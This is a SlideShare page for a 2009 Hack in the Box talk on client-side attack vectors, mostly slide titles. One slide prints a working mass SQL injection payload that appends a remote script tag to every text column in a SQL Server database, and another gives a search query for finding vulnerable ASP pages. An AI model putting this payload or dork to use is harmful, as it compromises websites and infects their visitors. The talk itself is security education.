How to own the world, one desktop at a time

1,240 views

Published on

As 2009 comes to a close, we look back on the bugs of our days. The past few months have seen some interesting attacks. This talk takes a look at some of the most effective attack vectors of 2009. These, coupled with classic web hacking, social engineering and a bit of cleverness, increase the attack surface manifold. This year, my work goes beyond just browsers and looks at examples of mass ownage, new infection vectors, advanced client-side exploitation, malicious payloads, browser infection with toolbars and more.

Published in: Technology, News & Politics
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,240
On SlideShare
0
From Embeds
0
Number of Embeds
39
Actions
Shares
0
Downloads
0
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

How to own the world, one desktop at a time

  1. 1. How to own the world,one desktop at a time<br />Saumil Shah, Net-Square<br />Hack in the Box<br />Kuala Lumpur 2009<br />
  2. 2. # who am i<br />Saumil Shah, CEO Net-square<br />LinkedIn: saumilshah<br />
  3. 3. I&apos;M IN UR BASE<br />KILLIN UR D00DZ<br />
  4. 4.
  5. 5. &quot;The amount of intelligence in the world stays constant and the population increases.&quot;<br />
  6. 6. The Attack Surface<br />
  7. 7. The Attack Surface++<br />
  8. 8.
  9. 9. Browser Attacks<br />
  10. 10.
  11. 11. Helping Hands<br />Alexander Sotirov, Mark Dowd - Bypassing Browser Memory Protection<br />
  12. 12. Taking your work to the masses<br />SQL Injection<br />XSS<br />
  13. 13. The metamorphosis of script src<br />
  14. 14. Web Hacking<br />
  15. 15. SQL Injection Discovery<br />inurl:&quot;.asp&quot; inurl:&quot;a=&quot;<br />
  16. 16. An example<br />
  17. 17. Mass SQL Injection vector<br />declare @m varchar(8000);<br />set @m=&apos;&apos;;<br />select @m=@m+&apos;update[&apos;+a.name+&apos;]set[&apos;+b.name+&apos;]=rtrim(convert(varchar,&apos;+b.name+&apos;))+&apos;&apos;&lt;script src=&quot;http://is.gd/31337&quot;&gt;&lt;/script&gt;&apos;&apos;;&apos;<br />from dbo.sysobjects objs, dbo.syscolumns cols, dbo.systypes typs<br />where objs.id=cols.id<br />and objs.xtype=&apos;U&apos;<br />and cols.xtype=typs.xtype<br />and typs.name=&apos;varchar&apos;;<br />set @m=REVERSE(@m);<br />set @m=substring(@m,PATINDEX(&apos;%;%&apos;,@m),8000);<br />set @m=REVERSE(@m);<br />exec(@m);<br />
  18. 18. Documents<br />
  19. 19. Penetration Document FormatTM<br />http://blog.didierstevens.com<br />
  20. 20. &quot;Confidence in a connected world&quot;<br />
  21. 21. Security by pop-ups<br />
  22. 22. kthxbai<br />www.net-square.com<br />secure . automate . innovate<br />

×